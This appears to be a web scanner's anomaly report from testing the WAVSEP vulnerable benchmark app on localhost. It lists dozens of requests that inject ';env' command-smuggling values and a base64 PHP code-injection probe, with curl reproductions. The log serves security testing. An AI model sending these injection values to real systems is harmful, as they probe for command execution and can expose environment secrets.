Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case52-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case61-LFI-ContextStream-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case62-LFI-ContextStream-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case65-LFI-ContextStream-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case66-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case68-LFI-ContextStream-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case01-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case02-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case03-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case04-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case05-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultFullInput-NoProtocolReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case06-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultInvalidInput-NoProtocolReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case07-RFI-UrlClass-FilenameContext-Unrestricted-HttpURL-DefaultEmptyInput-NoProtocolReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case08-RFI-UrlClass-FilenameContext-HttpInputValidation-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/RFI/RFI-Detection-Evaluation-GET-500Error/Case09-RFI-UrlClass-FilenameContext-HttpInputRemoval-HttpURL-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%3Benv"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter username
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=textvalue2 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F&password=textvalue2"

Anomaly found in /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp

The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msg
GET /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case02-InjectionInSearch-String-UnionExploit-WithErrors.jsp?msg=a%3Bexit%28base64_decode%28%27dzRwMXQxX2V2YWw%3D%27%29%29%3B%2F%2F HTTP/1.1
Host: 127.0.0.1:8090
